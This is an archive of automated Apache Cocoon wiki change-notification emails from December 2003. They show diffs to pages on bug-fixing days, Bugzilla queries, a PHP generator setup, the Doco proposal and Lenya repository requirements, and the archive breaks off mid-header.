Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFriday , version: 20 on Sat Dec 6 00:43:34 2003 by DavidCrossley - * See also [HowWeUseBugzilla] + * See also [HowWeUseBugzilla]. ? + + * Study the lists of open bugs and patches using [BugzillaQueries]. - * Study the list of [open bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=CocoonOpenIssues&newqueryname=&order=Reuse+same+sort+as+last+time] - and the list of [patches|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=%5BPATCH%5D&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&namedcmd=Cocoon+all&newqueryname=cocoon+patch+queue&tofooter=1&order=Reuse+same+sort+as+last+time] - * Write a short note on what you did on the day's notes page (see below) ? ^ ^^^^^^^^^^^^ + * Write a short note about what you did on the day's notes page. ? ++ ^^ ^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=PHPGenerator , version: 47 on Sat Dec 6 00:22:38 2003 by 161.129.204.104 - powers of Cocoon to separate their content, style, and logic + powers of Cocoon(!) to separate their content, style, and logic ? +++ - Hit {{http://localhost:8080/cocoon/test.php}} and you should have your page! Obviously, just printing XML from PHP is a little stupid, so this would be very useful if you wanted to use the myriad of other ways that PHP can generate data (Database, etc). Then again, if you're generating XML from a database, consider using [one of the many ways|SpecificDatabaseConnection] that Cocoon can connect to a database. ? ^ + Hit {{http://localhost:8080/cocoon/test.php}} and you should have your page! Obviously, just printing XML from PHP is a little stupid, so this would be very useful if you wanted to use the myriad of other ways that PHP can generate data (Database, etc). Then again, if you're generating XML from a database, consider using [one of the many ways|SpecificDatabasvvvConnection] that Cocoon can connect to a database. ? ^^^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowWeUseBugzilla , version: 18 on Sat Dec 6 00:28:20 2003 by DavidCrossley - Note that there are some prepared [BugzillaQueries] ready for your to enjoy. ? --- + Note that there are some prepared [BugzillaQueries] ready for your enjoyment. ? ++++ - A bug is acknowledged (or at least sounds reasonable if no one wants to dive in deeper), but it won't be fixed for what ever reasons. One example where the XMLForms related bugs after the deprecation of XMLForms. ? ^^^^ + A bug is acknowledged (or at least sounds reasonable if no one wants to dive in deeper), but it won't be fixed for what ever reasons. One example was the XMLForms related bugs after the deprecation of XMLForms. ? ^^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 18 on Sat Dec 6 00:38:39 2003 by DavidCrossley - * + * Bugzilla is proving very useful, especially with the new BugzillaQueries and How pages, and the general attention to Bugzilla that the FirstFridays are bringing. From [email protected] Sat Dec 06 02:00:14 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62566 invoked from network); 6 Dec 2003 02:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 6 Dec 2003 02:00:13 -0000 Received: (qmail 79408 invoked by uid 500); 6 Dec 2003 01:59:56 -0000 Delivered-To: [email protected] Received: (qmail 79372 invoked by uid 500); 6 Dec 2003 01:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79359 invoked from network); 6 Dec 2003 01:59:56 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 6 Dec 2003 01:59:56 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB6203p17576 for <[email protected]>; Sat, 6 Dec 2003 03:00:03 +0100 Date: Sat, 6 Dec 2003 03:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] PHPGenerator Sat Dec 6 03:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=PHPGenerator , version: 49 on Sat Dec 6 01:56:33 2003 by DavidCrossley - __Part of the problem is that the PHP docs concerning compiling {{--with-servlet}} are not very clear. Hopefully this document will clear up some of the confusion.__ ? -- -- + Part of the problem is that the PHP docs concerning compiling {{--with-servlet}} are not very clear. Hopefully this document will clear up some of the confusion. - __This process was done on a Debian Linux 3.0r0 system and a CVS checkout of Cocoon-2.1dev__ ? -- -- + This process was done on a Debian Linux 3.0r0 system and a CVS checkout of Cocoon-2.1dev - powers of Cocoon(!) to separate their content, style, and logic ? --- + powers of Cocoon to separate their content, style, and logic From [email protected] Sat Dec 06 08:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41962 invoked from network); 6 Dec 2003 08:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 6 Dec 2003 08:00:15 -0000 Received: (qmail 67874 invoked by uid 500); 6 Dec 2003 07:59:52 -0000 Delivered-To: [email protected] Received: (qmail 67847 invoked by uid 500); 6 Dec 2003 07:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67836 invoked from network); 6 Dec 2003 07:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 6 Dec 2003 07:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB6802p18073 for <[email protected]>; Sat, 6 Dec 2003 09:00:02 +0100 Date: Sat, 6 Dec 2003 09:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] FirstFridayDecember2003 Sat Dec 6 09:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 19 on Sat Dec 6 08:03:42 2003 by BertrandDelacretaz + * It's hard for virtual synchronous meetings to happen. Yesterday there were quite a few people on the #cocoon IRC channel, but relatively little activity on bugzilla, lists or IRC. Apparently several of us were willing to be there but unable to actually contribute. From [email protected] Sat Dec 06 09:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65476 invoked from network); 6 Dec 2003 09:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 6 Dec 2003 09:00:17 -0000 Received: (qmail 97885 invoked by uid 500); 6 Dec 2003 08:59:52 -0000 Delivered-To: [email protected] Received: (qmail 97856 invoked by uid 500); 6 Dec 2003 08:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97841 invoked from network); 6 Dec 2003 08:59:52 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 6 Dec 2003 08:59:52 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB6903p18107 for <[email protected]>; Sat, 6 Dec 2003 10:00:04 +0100 Date: Sat, 6 Dec 2003 10:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BugzillaQueries FirstFridayDecember2003 Sat Dec 6 10:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BugzillaQueries , version: 3 on Sat Dec 6 08:23:36 2003 by BertrandDelacretaz - * Bugs changed in the [last two days|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=2&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] + * Bugs changed in the last [two|http://nagoya.apache.org/bugzilla/buglist.cgi?changedin=2&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] or [seven|http://nagoya.apache.org/bugzilla/buglist.cgi?changedin=7&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&! bugidtype=include&bug_id=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] days (''changedin'' URL parameter selects number of days). Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 19 on Sat Dec 6 08:03:42 2003 by BertrandDelacretaz + * It's hard for virtual synchronous meetings to happen. Yesterday there were quite a few people on the #cocoon IRC channel, but relatively little activity on bugzilla, lists or IRC. Apparently several of us were willing to be there but unable to actually contribute. From [email protected] Sat Dec 06 13:00:06 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22523 invoked from network); 6 Dec 2003 13:00:06 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 6 Dec 2003 13:00:06 -0000 Received: (qmail 14418 invoked by uid 500); 6 Dec 2003 13:00:04 -0000 Delivered-To: [email protected] Received: (qmail 14389 invoked by uid 500); 6 Dec 2003 13:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14378 invoked from network); 6 Dec 2003 13:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 6 Dec 2003 13:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB6D02p18203 for <[email protected]>; Sat, 6 Dec 2003 14:00:03 +0100 Date: Sat, 6 Dec 2003 14:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] FirstFridayDecember2003 Sat Dec 6 14:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 20 on Sat Dec 6 12:54:15 2003 by DavidCrossley - * At 5.30 PM GMT there were...93 bugs left. A new query in [BugzillaQueries] shows which bugs have been changed in the last two days (right now: not many). ? ^ --- + * At 17.30 GMT there were...93 bugs left. A new query in [BugzillaQueries] shows which bugs have been changed in the last two days (right now: not many). ? ^^ + * At the end there was the same bugcount. Success is a hard thing to measure, isn't it. - * Bugzilla is proving very useful, especially with the new BugzillaQueries and How pages, and the general attention to Bugzilla that the FirstFridays are bringing. + * Bugzilla is proving very useful, especially with the new BugzillaQueries and HowWeUseBugzilla pages, and the general attention to Bugzilla that the FirstFridays are bringing. ? +++++++++++++ + * Well i would like to add my experience with that virtual synchronicity. My first ever IRC went really well. It was a good timing thing. I was only there for an hour or so while i worked on a bug. There were a lot of people connected, but only two other people active, and they were exactly the two that i needed to talk with. From [email protected] Sat Dec 06 22:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65434 invoked from network); 6 Dec 2003 22:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 6 Dec 2003 22:00:11 -0000 Received: (qmail 37693 invoked by uid 500); 6 Dec 2003 21:59:58 -0000 Delivered-To: [email protected] Received: (qmail 37661 invoked by uid 500); 6 Dec 2003 21:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37649 invoked from network); 6 Dec 2003 21:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 6 Dec 2003 21:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB6M03p18429 for <[email protected]>; Sat, 6 Dec 2003 23:00:03 +0100 Date: Sat, 6 Dec 2003 23:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Bookmarklets Sat Dec 6 23:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Bookmarklets , version: 2 on Sat Dec 6 22:08:50 2003 by PhilippJ - for cocoon-views check [this page|Wiki.jsp?page=DebuggingWithViews] ? -------------- + for cocoon-views check [this page|DebuggingWithViews] From [email protected] Sat Dec 06 23:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78016 invoked from network); 6 Dec 2003 23:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 6 Dec 2003 23:00:13 -0000 Received: (qmail 71219 invoked by uid 500); 6 Dec 2003 23:00:00 -0000 Delivered-To: [email protected] Received: (qmail 71092 invoked by uid 500); 6 Dec 2003 22:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71080 invoked from network); 6 Dec 2003 22:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 6 Dec 2003 22:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB6N04p18456 for <[email protected]>; Sun, 7 Dec 2003 00:00:04 +0100 Date: Sun, 7 Dec 2003 00:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Snippets DebuggingWithViews Bookmarklets Sun Dec 7 00:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Snippets , version: 27 on Sat Dec 6 22:15:16 2003 by PhilippJ + + !JavaScript Bookmarklets for cocoon-view debuging + Convenience [Bookmarklets|Bookmarklets] for working with cocoon-view debugging Page: http://wiki.cocoondev.org/Wiki.jsp?page=DebuggingWithViews , version: 15 on Sat Dec 6 22:11:57 2003 by PhilippJ + !Convenience Mozilla/IE bookmarklets + can be found [here|Bookmarklets] + Page: http://wiki.cocoondev.org/Wiki.jsp?page=Bookmarklets , version: 2 on Sat Dec 6 22:08:50 2003 by PhilippJ - for cocoon-views check [this page|Wiki.jsp?page=DebuggingWithViews] ? -------------- + for cocoon-views check [this page|DebuggingWithViews] From [email protected] Sun Dec 07 20:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55558 invoked from network); 7 Dec 2003 20:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Dec 2003 20:00:10 -0000 Received: (qmail 68011 invoked by uid 500); 7 Dec 2003 20:00:00 -0000 Delivered-To: [email protected] Received: (qmail 67982 invoked by uid 500); 7 Dec 2003 19:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67961 invoked from network); 7 Dec 2003 19:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 7 Dec 2003 19:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB7K03p26030 for <[email protected]>; Sun, 7 Dec 2003 21:00:03 +0100 Date: Sun, 7 Dec 2003 21:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Links Sun Dec 7 21:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Links , version: 65 on Sun Dec 7 19:24:31 2003 by 161.129.204.104 - * [eroute.net Java Web Hosting|http://www.eroute.net] + * [Oxxus JSP Hosting|http://www.oxxus.net] From [email protected] Sun Dec 07 21:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76386 invoked from network); 7 Dec 2003 21:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Dec 2003 21:00:13 -0000 Received: (qmail 99494 invoked by uid 500); 7 Dec 2003 21:00:00 -0000 Delivered-To: [email protected] Received: (qmail 99407 invoked by uid 500); 7 Dec 2003 20:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99387 invoked from network); 7 Dec 2003 20:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 7 Dec 2003 20:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB7L03p26057 for <[email protected]>; Sun, 7 Dec 2003 22:00:03 +0100 Date: Sun, 7 Dec 2003 22:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Doco Workflow Sun Dec 7 22:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Doco , version: 7 on Sun Dec 7 20:28:14 2003 by 161.129.204.104 - !Editing ja + !Editing mit den Helden Page: http://wiki.cocoondev.org/Wiki.jsp?page=Workflow , version: 9 on Sun Dec 7 20:36:25 2003 by 161.129.204.104 - |Helden| From [email protected] Mon Dec 08 00:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26611 invoked from network); 8 Dec 2003 00:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 00:00:11 -0000 Received: (qmail 23791 invoked by uid 500); 7 Dec 2003 23:59:57 -0000 Delivered-To: [email protected] Received: (qmail 23762 invoked by uid 500); 7 Dec 2003 23:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23751 invoked from network); 7 Dec 2003 23:59:56 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 7 Dec 2003 23:59:56 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8002p26130 for <[email protected]>; Mon, 8 Dec 2003 01:00:02 +0100 Date: Mon, 8 Dec 2003 01:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Doco Mon Dec 8 01:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Doco , version: 8 on Sun Dec 7 23:12:18 2003 by DavidCrossley - The proposal is about the creation of a content management system for apache projects, codenamed "Doco", whereas the priorities should be + The proposal is about the creation of a content management system for + apache projects, codenamed "Doco", whereas the priorities should be - !Editing mit den Helden + !Editing - # how do we transfert the content to the main web machine? croned inverted rsynch? direct transparent proxying/caching? ? - + # how do we transfer the content to the main web machine? croned inverted rsynch? direct transparent proxying/caching? From [email protected] Mon Dec 08 09:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97912 invoked from network); 8 Dec 2003 09:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 09:00:17 -0000 Received: (qmail 23780 invoked by uid 500); 8 Dec 2003 08:59:52 -0000 Delivered-To: [email protected] Received: (qmail 23755 invoked by uid 500); 8 Dec 2003 08:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23738 invoked from network); 8 Dec 2003 08:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 8 Dec 2003 08:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8903p26702 for <[email protected]>; Mon, 8 Dec 2003 10:00:04 +0100 Date: Mon, 8 Dec 2003 10:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonUserGroupHolland Mon Dec 8 10:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupHolland , version: 17 on Mon Dec 8 08:59:37 2003 by ArjeCahn + * Berend Snijder, Hippo, Amsterdam From [email protected] Mon Dec 08 10:00:41 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25862 invoked from network); 8 Dec 2003 10:00:41 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 10:00:41 -0000 Received: (qmail 6600 invoked by uid 500); 8 Dec 2003 09:59:57 -0000 Delivered-To: [email protected] Received: (qmail 6559 invoked by uid 500); 8 Dec 2003 09:59:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6463 invoked from network); 8 Dec 2003 09:59:56 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 8 Dec 2003 09:59:56 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8A08p26733 for <[email protected]>; Mon, 8 Dec 2003 11:00:09 +0100 Date: Mon, 8 Dec 2003 11:00:09 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Lenya LenyaRepositoryRequirements Mon Dec 8 11:00:08 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Lenya , version: 46 on Mon Dec 8 09:41:28 2003 by AndreasHartmann + * [LenyaRepositoryRequirements] Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaRepositoryRequirements , version: 7 on Mon Dec 8 10:09:47 2003 by RolfKulemann - !!!High priority ? - + !!!Highpriority - # Extensible metadata in order to reflect things like workflow as discussed here: http://article.gmane.org/gmane.comp.cms.lenya.devel/2005 + # Extensible metadata in order to reflect things like workflow as discussed here: [http://article.gmane.org/gmane.comp.cms.lenya.devel/2005] ? + + - # Moving of assets in the repository (without breaking contracts). The moving of assets can be implemented via metadata see 1.7.). See discussion here:\\ http://article.gmane.org/gmane.comp.cms.lenya.devel/2005\\ This requirement serves as basis to implement staging of assets. + # Moving of assets in the repository (without breaking contracts). The moving of assets can be implemented via metadata see 1.7.). See discussion here:\\ [http://article.gmane.org/gmane.comp.cms.lenya.devel/2005]\\ This requirement serves as basis to implement staging of assets. ? + + - !!!Medium Priority ? - + !!!MediumPriority - # Simple transaction features.Make sense when saving doc collections. Is an image a doc? I propose to use the term asset for all type of objects in the repository. Transactions seem to be useful for workflow if workflow is reflected/implemented via metadata of an asset. See discussion here:\\http://article.gmane.org/gmane.comp.cms.lenya.devel/2005 + # Simple transaction features.Make sense when saving doc collections. Is an image a doc? I propose to use the term asset for all type of objects in the repository. Transactions seem to be useful for workflow if workflow is reflected/implemented via metadata of an asset. See discussion here:\\[http://article.gmane.org/gmane.comp.cms.lenya.devel/2005] ? + + - !!! Low Priority ? - + !!! LowPriority - !!! Related Links + !!! OpenIssues - # http://marc.theaimsgroup.com/?t=107022316500003&r=1&w=2 - # http://thread.gmane.org/gmane.comp.cms.lenya.devel/1960 - # http://jcrep-jsr.day.com/content/playground/en.html + + !!! RelatedLinks + + # [http://marc.theaimsgroup.com/?t=107022316500003&r=1&w=2] + # [Thread in Lenya-Dev|http://thread.gmane.org/gmane.comp.cms.lenya.devel/1960] + # [JCR Playground|http://jcrep-jsr.day.com/content/playground/en.html] + From [email protected] Mon Dec 08 11:00:20 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56268 invoked from network); 8 Dec 2003 11:00:20 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 11:00:20 -0000 Received: (qmail 95593 invoked by uid 500); 8 Dec 2003 10:59:52 -0000 Delivered-To: [email protected] Received: (qmail 95454 invoked by uid 500); 8 Dec 2003 10:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95433 invoked from network); 8 Dec 2003 10:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 8 Dec 2003 10:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8B04p26764 for <[email protected]>; Mon, 8 Dec 2003 12:00:04 +0100 Date: Mon, 8 Dec 2003 12:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: 